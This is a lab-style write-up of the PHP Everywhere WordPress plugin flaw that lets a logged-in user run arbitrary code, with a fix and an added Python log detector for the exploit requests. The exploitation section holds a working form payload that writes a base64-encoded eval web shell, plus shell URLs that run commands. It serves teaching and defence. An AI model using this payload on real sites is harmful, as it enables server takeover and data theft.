Product Introduction
WordPress began as a personal blogging system and has gradually evolved into a general content management system. It is written in PHP and uses a MySQL database. Users can host their own sites on any server that supports PHP and MySQL.
Vulnerability Overview
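Any logged-in user, including one with only the subscriber role, can exploit this vulnerability by sending a request to admin-ajax.php with the action "parse-media-shortcode" and the "shortcode" parameter set to a PHP Everywhere shortcode. The PHP code inside the shortcode is then executed on the site, giving arbitrary PHP code execution.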
Scope of Impact
Affected plugin: PHP Everywhere
Affected versions: <= 2.0.3
Exploitation Process
Access the backend address:
http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/wp-admin
Account: test/test
After logging in, delete the content below the dashboard: press F12 in the browser to open the developer tools, add a node to the page, and enter the following content:
<form
action="http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php"
method="post"
>
<input name="action" value="parse-media-shortcode" />
<textarea name="shortcode">
[php_everywhere] <?php file_put_contents("/var/www/html/111.php", base64_decode("PD9waHAgZXZhbCgkX1JFUVVFU1RbJ2NtZCddKTsgPz4=")); ?>[/php_everywhere]</textarea>
<input type="submit" value="Execute" />
</form>
Then submit the form (click Execute) and access the following link:
http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/111.php
The page returns 200.
http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/111.php?cmd=phpinfo();
http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/111.php?cmd=system(%27tac%20/f*%27);
Recommended Fixes
- Upgrade the PHP Everywhere plugin to a version newer than 2.0.3.
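
To check logged request data for past or attempted exploitation, the request shape shown in the Exploitation Process can be matched directly. This is an added example, not part of the original write-up or the plugin's code; it assumes a log source that records POST bodies, and the record layout, function names and the example.test host are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Opening tag of the plugin's shortcode, as it appears in the request on this page.
TAG_RE = re.compile(r"\[php_everywhere(?![\w-])", re.IGNORECASE)
AJAX_PATH = "/wp-admin/admin-ajax.php"

def is_shortcode_exploit(method, url, body):
    """True for a POST to admin-ajax.php that routes a php_everywhere
    shortcode through the parse-media-shortcode action."""
    parts = urlsplit(url)
    if method.upper() != "POST" or not parts.path.endswith(AJAX_PATH):
        return False
    # parse_qs percent-decodes, so %5Bphp_everywhere%5D is caught too.
    form = parse_qs(body, keep_blank_values=True)
    query = parse_qs(parts.query, keep_blank_values=True)
    # The action name may be sent in the body or in the query string.
    actions = form.get("action", []) + query.get("action", [])
    if "parse-media-shortcode" not in actions:
        return False
    return any(TAG_RE.search(v) for v in form.get("shortcode", []))

def flag_requests(records):
    """Return the indexes of records that match the exploit request shape."""
    return [i for i, r in enumerate(records) if is_shortcode_exploit(*r)]

# Constructed sample records (method, URL, form body); example.test is a placeholder host.
SAMPLE = [
    ("POST", "http://example.test/wp-admin/admin-ajax.php",
     "action=parse-media-shortcode&shortcode=%5Baudio+src%3D%22a.mp3%22%5D"),
    ("POST", "http://example.test/wp-admin/admin-ajax.php",
     "action=parse-media-shortcode&shortcode=%5Bphp_everywhere%5D%3C%3Fphp+echo+1%3B+%3F%3E%5B%2Fphp_everywhere%5D"),
    ("POST", "http://example.test/wp-admin/admin-ajax.php?action=parse-media-shortcode",
     "shortcode=[php_everywhere]x[/php_everywhere]"),
    ("POST", "http://example.test/wp-admin/admin-ajax.php",
     "action=heartbeat&data=php_everywhere"),
    ("GET", "http://example.test/wp-admin/admin-ajax.php?action=parse-media-shortcode", ""),
]

if __name__ == "__main__":
    for i in flag_requests(SAMPLE):
        print("suspicious request:", SAMPLE[i][1])
```

A hit from an account that has no reason to render media shortcodes is worth following up by checking the web root for PHP files created around the same time.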